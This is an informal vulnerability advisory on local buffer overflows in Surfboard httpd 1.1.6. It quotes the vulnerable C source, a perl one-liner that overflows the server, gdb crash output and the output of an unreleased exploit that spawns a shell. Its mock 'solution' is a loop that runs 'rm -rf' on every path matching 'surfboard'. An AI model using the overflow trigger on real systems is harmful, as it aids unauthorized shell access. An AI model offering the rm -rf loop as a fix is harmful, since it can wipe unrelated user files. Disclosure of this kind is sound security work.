surfboard1.1.6 local exploit.
Nothing Special, just a local overflow issue:
Fluffy, the black security kat presents:
Surfboard httpd local overflows
Problem Description:
Due to lazy programmer, fluffy can exploit several flaws in surfboard httpd to
gain new shell, yippee.
Technical Details:
from surfboard.c line 31:
--------------------------------------------------------
/* This can be overridden from the command line */
char conffile[1024] = "/etc/surfboard/surfboard.conf";
/* All of these can be overridden from the config file */
char docroot[1024] = "/pub";
char logfile[1024] = "/var/log/surfboard/httpd.log";
char mimefile[1024] = "/etc/surfboard/mime.conf";
char mime_default[512] = "text/plain";
char dirindex[1024] = "index.html";
--------------------------------------------------------
from surfboard.c line 66 :
--------------------------------------------------------
main(int argc, char * argv[])
{
int s, a;
if(argc>1) { strcpy(conffile, argv[1]); } [1]
readconf(); [2]
log_msg(LOG_MSG, "Surfboard started");
if((s=setupsock())<0)
{
log_msg(LOG_ERR, "Could not open socket");
perror("Could not open socket");
--------------------------------------------------------
[1] Nasty cracker can happily pass a long arguement on cmd line to cause buffer
overflow.
A simple attack: ./surfd /etc/`perl -e 'printf "A"x2212'`
[2] readconf routine is buggy and can be overflowed:
from surfboard.c line 605:
--------------------------------------------------------
void readconf(void)
{
FILE * conf;
char cmd[512];
char buf[1600];
sprintf(buf, "Reading config from file \"%s\"", conffile);
log_msg(LOG_DEBUG, buf);
if((conf=fopen(conffile, "r"))==NULL)
{
sprintf(buf, "Could not open config file \"%s\"", conffile);
log_msg(LOG_ERR, buf);
fprintf(stderr, "%s\n", buf);
exit(1);
}
while(1)
{
fscanf(conf, " %s ", cmd);
if(feof(conf)) { break; }
if(cmd[0]=='#') { while(getc(conf)!='\n'); continue; }
if(!strcmp(cmd, "Port"))
{
fscanf(conf, " %d", &myport);
continue;
}
if(!strcmp(cmd, "DocRoot"))
{
fscanf(conf, " %s", docroot);
continue;
}
..Same style of code to get our options from config file..
--------------------------------------------------------
fluffy found that if he built a fake config file, and fired up surfboard with
that
config file, overflow will occur:
bash-2.05b$ gdb surfd
GNU gdb 5.3
Copyright 2002 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-slackware-linux"...
(gdb) r /home/deadbeat/surfboard.conf
Starting program: /home/deadbeat/security/research/archive/surfboard/surfd
/home/deadbeat/surfboard.conf
Program received signal
SIGSEGV, Segmentation fault.
do_lookup_versioned (undef_name=0x40034fbf "free", hash=448693,
ref=0x40030a18, result=0xbfffed34, scope=0x300, i=0, version=0x40158020,
skip=0x0, type_class=1) at do-lookup.h:81
81 do-lookup.h: No such file or directory.
in do-lookup.h
Exploits:
Fluffy doesn't need to release exploits as anyone reading this should be able to
build a exploit based on information provided by fluffy :)
bash-2.05b$ ./surfex
Shellc0de is at: 0xbfffffb4
sh-2.05b$
Solution:
fluffy has written a great cmd line hack to solve the problem:
for i in `locate surfboard`; do rm -rf $i ; done
Should do the trick ;)